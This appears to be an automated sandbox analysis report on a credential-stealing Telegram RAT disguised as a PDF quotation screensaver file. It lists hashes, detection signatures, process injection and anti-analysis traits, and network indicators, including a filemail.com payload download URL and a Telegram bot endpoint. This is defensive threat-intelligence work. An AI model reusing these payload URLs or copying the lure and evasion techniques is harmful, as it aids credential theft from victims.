Edit tour

Windows Analysis Report
QUOTATION_JANQUOTE312025#U00faPDF.scr

Overview

General Information

Sample name:	QUOTATION_JANQUOTE312025#U00faPDF.scr renamed because original name is a hash value
Original sample name:	QUOTATION_JANQUOTE312025PDF.scr
Analysis ID:	1614909
MD5:	e63401dadbae9a4ebd6ce665946ea633
SHA1:	9ac1d2865acfd258a07cb867a0b312b0928045dd
SHA256:	95ae323853bc8dd988d2ff7c9385d63e6fb5147e409a91cddf60a121f17928a5
Infos:

Detection

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

QUOTATION_JANQUOTE312025#U00faPDF.scr (PID: 1852 cmdline: "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S MD5: E63401DADBAE9A4EBD6CE665946EA633)

QUOTATION_JANQUOTE312025#U00faPDF.scr (PID: 1988 cmdline: "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" MD5: E63401DADBAE9A4EBD6CE665946EA633)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2587912231.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3287257268.00000000032E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1988	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-14T09:21:32.648229+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49942	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Avira: detected

Multi AV Scanner detection for submitted file

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr	Virustotal: Detection: 34%			Perma Link
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr	ReversingLabs: Detection: 13%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49951 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 193.30.119.107:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_068806B8
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_068807AA
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_068802B4
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_068800CF
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_06880014
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_06880040
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_06880845
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_0688018C
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_06880936
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4x nop then jmp 068800EBh	4_2_0688015C

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49942 -> 193.122.6.168:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49951 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRbLhJy2w&pk_vid=8e2aec8f065dac991739460400c1eb95 HTTP/1.1Host: 3007.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: 3007.filemail.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://3007.filemail.com
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr	String found in binary or memory: http://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yRb
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.000000000321D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://3007.filemail.com
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://3007.filemail.com/api/file/get?filekey=nN9I6mMR5qmTacpgxgPZpOTdYp-SW4HTmVvL2C95n_miGOwF3I4yR
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000031FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 193.30.119.107:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: QUOTATION_JANQUOTE312025#U00faPDF.scr

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_063F5D90 NtResumeThread,		0_2_063F5D90
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_063F5D8A NtResumeThread,		0_2_063F5D8A

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_0157E6B0	0_2_0157E6B0
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_0157A958	0_2_0157A958
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_0157A968	0_2_0157A968
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_0157AEF0	0_2_0157AEF0
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_0157AEE0	0_2_0157AEE0
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_077FF298	0_2_077FF298
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_077FF580	0_2_077FF580
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_077FE298	0_2_077FE298
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_077FDDE0	0_2_077FDDE0
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_077E0040	0_2_077E0040
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_077E0007	0_2_077E0007
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_01643978	4_2_01643978
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_016440D8	4_2_016440D8
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0164F098	4_2_0164F098
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0164C288	4_2_0164C288
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_016440C7	4_2_016440C7
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_016493E9	4_2_016493E9
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_016493F8	4_2_016493F8
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0164BAE8	4_2_0164BAE8
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0164454F	4_2_0164454F
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_01643E20	4_2_01643E20
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_01643E10	4_2_01643E10
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0688D778	4_2_0688D778
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0688CA18	4_2_0688CA18
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06881F99	4_2_06881F99
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06881FA8	4_2_06881FA8
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06889FED	4_2_06889FED
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06884400	4_2_06884400
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06883469	4_2_06883469
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_068843FF	4_2_068843FF
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_068843F0	4_2_068843F0
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06880014	4_2_06880014

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003341000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585698280.0000000006970000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBshrwx.dll" vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000000.2041839228.0000000000D43000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNlslnred.exe> vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.00000000042C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2569130721.00000000011BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004289000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBshrwx.dll" vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3285263428.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3285478701.0000000000FB7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs QUOTATION_JANQUOTE312025#U00faPDF.scr
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr	Binary or memory string: OriginalFilenameNlslnred.exe> vs QUOTATION_JANQUOTE312025#U00faPDF.scr

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, S1Zbg2pp4rKsDwwU6hU.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, FLQdLKipqaaenTJXjB.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
